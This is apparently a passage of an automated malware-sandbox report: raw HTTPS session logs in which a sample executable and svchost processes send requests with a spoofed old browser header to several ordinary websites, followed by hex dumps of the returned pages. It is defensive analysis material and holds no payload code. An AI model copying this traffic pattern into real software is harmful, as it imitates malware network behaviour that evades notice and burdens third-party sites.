                                                                                                                                                                                                                                                                                                      X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:06 GMT
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC665INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC669INData Raw: 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e
                                                                                                                                                                                                                                                                                                      Data Ascii: readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).con
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC678INData Raw: 36 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70
                                                                                                                                                                                                                                                                                                      Data Ascii: 6 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' rep
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC686INData Raw: 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f
                                                                                                                                                                                                                                                                                                      Data Ascii: ript' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC694INData Raw: 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75
                                                                                                                                                                                                                                                                                                      Data Ascii: tps://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="120x120" href="https://dataform.co.u
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC703INData Raw: 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 50 72 69 63 69 6e 67 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69
                                                                                                                                                                                                                                                                                                      Data Ascii: menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-text">Pricing</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-i
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC711INData Raw: 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 73 63 72 69 70 74 73 2e 6a 73 3f 76 65 72 3d 35 2e 31 2e 33 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 67 6f 5f 70 72 69 63 69 6e
                                                                                                                                                                                                                                                                                                      Data Ascii: -form-7\/v1"}};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/go_pricin


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      2192.168.2.550171138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:27 UTC51OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: www.diamir.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:27 UTC51INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:44:27 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 548
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:27 UTC52INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      20192.168.2.562416188.114.97.3443C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC335OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: hyab.se
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC350INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:06 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Location: https://hyab.com
                                                                                                                                                                                                                                                                                                      Cache-Control: max-age=600
                                                                                                                                                                                                                                                                                                      Expires: Wed, 22 Mar 2023 04:55:06 GMT
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qR5PHbgHvv4wI36XnyqdG0rN1PEfiGExifZeKVLXPBDoZJaYzCuJJXKpl7j2Fvb578u35qyvQ3O4VST0eIDMtvyKHuq6dpXvLMkN9BFO10SsL7m%2ByP%2FhrJIw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc88529a6900c-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC351INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC351INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      21192.168.2.560953185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC335OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: techtrans.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC337INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:06 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC337INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      22192.168.2.559805138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC335OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: diamir.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC337INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:06 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 162
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC337INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      23192.168.2.56066591.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC336OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC354INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:52 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC355INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                                                      Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC411INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 44 61 74 61 20 70 75 62 6c 69 6b 61 63 6a 69 3a 20 3c 2f 73 70 61 6e 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 30 33 2e 31 30 2e 32 30 32 32 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 32 30 30 30 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f
                                                                                                                                                                                                                                                                                                      Data Ascii: <span class="sr-only">Data publikacji: </span><i class="fa fa-clock-o" aria-hidden="true"></i> 03.10.2022 </div>2000 </div> </article> </section> </section></div>... topnews. -->... co
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC428INData Raw: 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 0d 0a 31 30 30 30 0d 0a 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20
                                                                                                                                                                                                                                                                                                      Data Ascii: :10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?v=1657112618" alt="Zo1000sta jednym z nas - PRACA W POLICJI" /></a></div><div class="item" style="width:300px;
